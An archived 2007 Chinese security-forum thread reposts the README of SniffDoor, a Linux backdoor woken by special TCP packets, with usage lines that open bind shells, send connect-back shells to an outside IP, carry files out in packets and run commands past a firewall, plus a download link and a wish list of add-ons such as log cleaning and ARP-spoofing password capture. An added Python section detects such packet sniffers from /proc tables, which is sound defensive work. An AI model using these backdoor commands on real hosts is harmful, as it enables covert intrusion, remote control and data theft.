EvilOctal Security Team Technical Discussion Group's Archiver

perlish 2007-5-31 21:00

[Repost] SniffDoor V 0.7a (open source)

Author: wzt
Original source: xsec.org

SniffDoor V 0.7a (c) 2007  by wzt  <wzt@xsec.org>
+--------------------------------------------------+

Sniffdoor is a Linux backdoor woken up by a special
TCP packet. It can bind a shell with a tty, and it can send
files in TCP packets, which means the server side
can sniff your files from the special TCP packets
and save them on the server. The client can send a shell
command in the packet; the server sniffs and executes
it, so it can get around the firewall.

+--------------------------------------------------+
[USAGE]:

server:

type make;
./sniffdoor

client:
type make;

sniffdoor <options> [remote_ip] [port] [command]

<options>:
-packet <remote_ip> [port] <command>
-connect <remote ip> <port>
-listen <port>

<command>:
bind:<port>
back:<remote_ip> <port>
file:<filename>
comm:<command>

1. bindshell:
  send tcp packet to host 61.155.217.56,and then it
  bind a shell on port 999
  ./client -packet 61.155.217.56 bind:999
  ./client -packet 61.155.217.56 22 bind:999
  port 22 is an active port on the host.

2.connect back door:
  1).your server must listen on a port first (your ip
    is 123.45.64.57):
  ./client -listen 999

  2).send tcp packet to host 61.155.217.56,and then
  bind a shell to remote 123.45.64.57 on port 999
  ./client -packet 61.155.217.56 back:123.45.64.57:999
  ./client -packet 61.155.217.56 21 back:123.45.64.57:999

3.send file:
  1).send file with tcp packet.
  ./client -packet 61.155.217.56 file:bind.c
  ./client -packet 61.155.217.56 80 file:bind.c

  NOTE!
  It can only send text files, not binary files.
  If you fix this bug, mail me, thx.

4.execute command:
  1).execute command with tcp packet.
  ./client -packet 61.155.217.56 comm:"gcc -o bind bind.c"
  ./client -packet 61.155.217.56 23 comm:"gcc -o bind bind.c"

+-----------------------------------------------------+

[THANKS]:

Thanks to baozi for testing the door all the time.

[END]:

send any bug to <wzt@xsec.org>.

download: http://wzt.wzt.googlepages.com/sniffdoor.tar

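I plan to turn this into an all-in-one tool. Suggestions are welcome on what other features a Linux backdoor + penetration program still needs (of course, the attack target can perfectly well be Windows).
My requirements:
1: bring in ttysniffer --> very difficult.
2: port htran from Windows, including socks5 (with username and password) --> somewhat difficult, e.g. client sends ip pack -proxy -bind eth0 port user pass --> in progress!
3: logcleaner --> easy job
4: portscanner with banner grabber --> the same
5: nbtenum for windows --> easy job
6: bring in ARP spoofing + a network sniffer, which can capture some cleartext passwords; if it could capture SMB it would be super powerful --> moderate difficulty
7: mssql scan + mssql client --> easy job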
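
A defender's view of the description above, as an added example that is not part of the original post or of SniffDoor's code: a backdoor that wakes on sniffed TCP packets opens no listening port, but it must hold a capture socket, which Linux lists in /proc/net/packet and /proc/net/raw. The sketch assumes the server uses an AF_PACKET or a raw IPPROTO_TCP socket (the page does not say which); the sample tables and inode numbers are constructed.

```python
import os

# Constructed sample of /proc/net/packet (AF_PACKET sockets); not from a real host.
SAMPLE_PACKET = """\
sk       RefCnt Type Proto  Iface R Rmem   User   Inode
ffff9a3c01 3      3    0003   0     1 0      0      41877
ffff9a3c02 3      2    88cc   2     1 0      101    20311
"""
# Constructed sample of /proc/net/raw; the "port" of local_address is the IP protocol.
SAMPLE_RAW = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops
   6: 00000000:0006 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 51234 2 ffff9a3c03 0
   1: 00000000:0001 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 18001 2 ffff9a3c04 0
"""
ETH_P_ALL, ETH_P_IP, IPPROTO_TCP = 0x0003, 0x0800, 6

def packet_sniffers(text):
    """Inodes of AF_PACKET sockets bound to a protocol that delivers IPv4/TCP frames."""
    rows = (line.split() for line in text.splitlines()[1:])
    return [int(f[8]) for f in rows if len(f) >= 9 and int(f[3], 16) in (ETH_P_ALL, ETH_P_IP)]

def raw_tcp_sniffers(text):
    """Inodes of AF_INET raw sockets opened for IPPROTO_TCP (they get copies of inbound TCP)."""
    rows = (line.split() for line in text.splitlines()[1:])
    return [int(f[9]) for f in rows if len(f) >= 10 and int(f[1].split(":")[1], 16) == IPPROTO_TCP]

def owners(inodes, proc="/proc"):
    """Map socket inodes to (pid, comm) via /proc/<pid>/fd; needs root to see every process."""
    wanted = {f"socket:[{i}]": i for i in inodes}
    found = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            for fd in os.listdir(f"{proc}/{pid}/fd"):
                target = os.readlink(f"{proc}/{pid}/fd/{fd}")
                if target in wanted:
                    with open(f"{proc}/{pid}/comm") as comm:
                        found[wanted[target]] = (int(pid), comm.read().strip())
        except OSError:  # process exited or permission denied
            continue
    return found

if __name__ == "__main__":  # live check on a Linux host
    with open("/proc/net/packet") as p, open("/proc/net/raw") as r:
        inodes = packet_sniffers(p.read()) + raw_tcp_sniffers(r.read())
    print(owners(inodes))
```

Legitimate programs such as DHCP clients and packet capture tools also hold these sockets, so the output is a list of processes to review against what the host is expected to run.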

我非我 2007-5-31 22:40

I was wondering why xsec hadn't been updated for so long, hehe
Showing my support

perlish 2007-6-8 22:32

Everyone has been busy lately and too lazy to update, hehe
Thanks for your interest :)

© 1999-2008 EvilOctal Security Team